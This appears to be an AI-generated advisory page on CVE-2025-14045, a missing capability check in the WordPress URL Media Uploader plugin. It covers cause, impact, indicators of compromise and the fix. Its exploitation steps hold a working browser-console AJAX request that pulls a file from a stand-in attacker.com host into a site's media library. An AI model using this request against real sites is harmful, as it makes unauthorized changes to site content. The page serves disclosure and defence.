CVE-2025-14045: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14045 is a Missing Authorization vulnerability in the URL Media Uploader plugin for WordPress, affecting all versions up to and including 1.0.1. The flaw allows authenticated attackers with Contributor-level access or above to upload media files to the WordPress media library, bypassing the platform's standard permission model. It was discovered on November 26, 2025, by Jason Carle (jsonc) via responsible disclosure through Wordfence, and published on December 12, 2025. It carries a CVSS v3.1 base score of 4.3 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is CWE-862 (Missing Authorization): the plugin's AJAX handler url_media_uploader_url_upload_ajax_handler() in url-media-uploader.php (lines 52–76) performs nonce verification but omits a capability check for upload_files before processing upload requests. The handler is registered only under wp_ajax_* (authenticated users), preventing unauthenticated exploitation, but any logged-in Contributor or higher can obtain a valid nonce from any admin page where the plugin's scripts are enqueued and then submit a crafted AJAX POST request to upload files from external URLs into the media library. The fix requires adding if (!current_user_can('upload_files')) { ... } immediately after the nonce check (GitHub Gist, Plugin Source).

Impact

Successful exploitation allows low-privileged authenticated users (Contributors) to upload media files to the WordPress media library, a capability normally restricted to Authors, Editors, and Administrators. While the vulnerability is limited to "safe" file uploads (not arbitrary code execution), it can be abused to inject unwanted or malicious-looking content into the media library, potentially enabling phishing assets, defacement material, or content that could be leveraged in further social engineering attacks. Confidentiality and availability are not directly impacted; the primary risk is unauthorized integrity modification of the site's media assets (Wordfence, GitHub Gist).

Exploitability

A public proof-of-concept (PoC) was published by the discoverer, Jason Carle, demonstrating exploitation via browser console JavaScript on any admin page where the plugin's scripts are loaded. The EPSS score is approximately 0.026% (very low), and there is no evidence of in-the-wild exploitation or inclusion in the CISA KEV catalog as of the time of reporting. Exploitation requires a valid WordPress account with at least Contributor role, making mass exploitation less likely but still a realistic risk on sites with open user registration (GitHub Gist, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the URL Media Uploader plugin (versions ≤ 1.0.1) using tools like WPScan or by checking /wp-content/plugins/url-media-uploader/ for plugin presence.
  2. Obtain a Contributor account: Register or use an existing Contributor-level (or higher) WordPress account on the target site.
  3. Retrieve a valid nonce: Log in and navigate to any admin page where the plugin's scripts are enqueued (e.g., /wp-admin/post-new.php, /wp-admin/upload.php). Open the browser developer console and extract the nonce: var nonce = urlMediaUploader.nonce; var ajaxUrl = urlMediaUploader.ajax_url;
  4. Send the malicious AJAX request: Execute the following in the browser console to upload a file from an external URL:
jQuery.ajax({
  url: ajaxUrl,
  type: 'POST',
  data: {
    action: 'url_media_uploader_url_upload',
    url: 'https://attacker.com/malicious-image.jpg',
    nonce: nonce
  },
  success: function(response) { console.log(response); }
});
  1. Verify upload: Confirm the file appears in the WordPress media library at /wp-admin/upload.php using the returned attachment_id (GitHub Gist).

Indicators of compromise

  • Logs: WordPress access logs showing authenticated POST requests to /wp-admin/admin-ajax.php with action=url_media_uploader_url_upload from Contributor-level user accounts; repeated or automated requests to this endpoint from a single user or IP.
  • File System: Unexpected media files appearing in wp-content/uploads/ that were sourced from external URLs not associated with normal site operations; files uploaded by user accounts with Contributor role.
  • WordPress Admin: Media library entries attributed to Contributor-level users, which is abnormal under default WordPress permissions; review wp_posts table for post_type='attachment' entries authored by Contributors.
  • Network: Outbound HTTP requests from the WordPress server to external URLs during the upload process, initiated by the plugin fetching remote files on behalf of the attacker (GitHub Gist).

Mitigation and workarounds

Update the URL Media Uploader plugin to version 1.0.2 or later, which adds the required current_user_can('upload_files') capability check to the AJAX handler. If an immediate update is not possible, site administrators can deactivate or remove the plugin as a temporary workaround. Additionally, review the WordPress media library for any files uploaded by Contributor-level accounts and remove unauthorized content (Wordfence, GitHub Gist).

Community reactions

The vulnerability was responsibly disclosed by Jason Carle through Wordfence on November 26, 2025, and Wordfence published the advisory upon CVE assignment in December 2025. No significant broader media coverage or notable community debate has been identified beyond the standard vulnerability disclosure process (Wordfence).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management